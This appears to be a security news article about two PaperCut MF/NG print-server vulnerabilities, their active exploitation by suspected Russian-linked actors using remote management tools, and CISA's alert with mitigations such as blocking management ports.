The print management software firm PaperCut has recently alerted users about two severe vulnerabilities that allow remote attacks. US CISA has also confirmed active exploitation for one of these vulnerabilities.
CISA Alerts About PaperCut MF/NG Vulnerabilities
PaperCut has recently issued an emergency update for its users, rolling out patches for two severe vulnerabilities.
As described in its advisory, PaperCut has disclosed two different vulnerabilities affecting its print management software. Besides elaborating on the flaws, the firm also confirmed active exploitation of one of these vulnerabilities, as alerted by Trend Micro.
Regarding the flaws, the first of these is a remote code execution vulnerability (CVE-2023–27350) that allows an unauthenticated remote attacker to target PaperCut Application Server. The flaw received a critical severity rating with a CVSS score of 9.8. PaperCut hasn’t disclosed more details about this vulnerability as it confirmed its active exploitation based on the reports from Trend Micro.
The second issue (CVE-2023–27351) also allows remote attacks from an unauthenticated adversary to steal sensitive information stored in PaperCut MF or NG. That includes usernames, email addresses, full names, card numbers, and department or office details of the users. This vulnerability received a high-severity rating with a CVSS score of 8.2. Thankfully, the bug received a patch before exploitation.
Following this emergency disclosure, the cybersecurity firm also shared a detailed analysis of the attacks exploiting the RCE flaw.
According to their report, the attacks seemingly target around 1800 vulnerable PaperCut servers, which the attackers abuse to spawn RMM tools like Atero and Syncro on the target devices for persistent access. They have also shared a PoC for the flaw.
While the exact identity of the threat actors exploiting this vulnerability remains veiled, Huntress researchers suspect Russian threat actors behind it. Briefly, while not directly linked, they somehow find Truebot malware related to this activity, which eventually leads back to the Cl0p ransomware and Silence entities.
CISA Also Alerts About PaperCut Flaws
The US CISA has also added the under-attack vulnerability CVE-2023–27350 to its list of actively exploited bugs.
While the firm urges deploying the updates, it also advised some precautionary measures for the systems where an immediate update is not possible. These mitigations include blocking inbound traffic from external IPs to the web management ports 9191 and 9192, blocking all incoming traffic to the web management portal on the firewall to the server to prevent lateral movement of potential attackers, and applying an allow list.
Let us know your thoughts in the comments.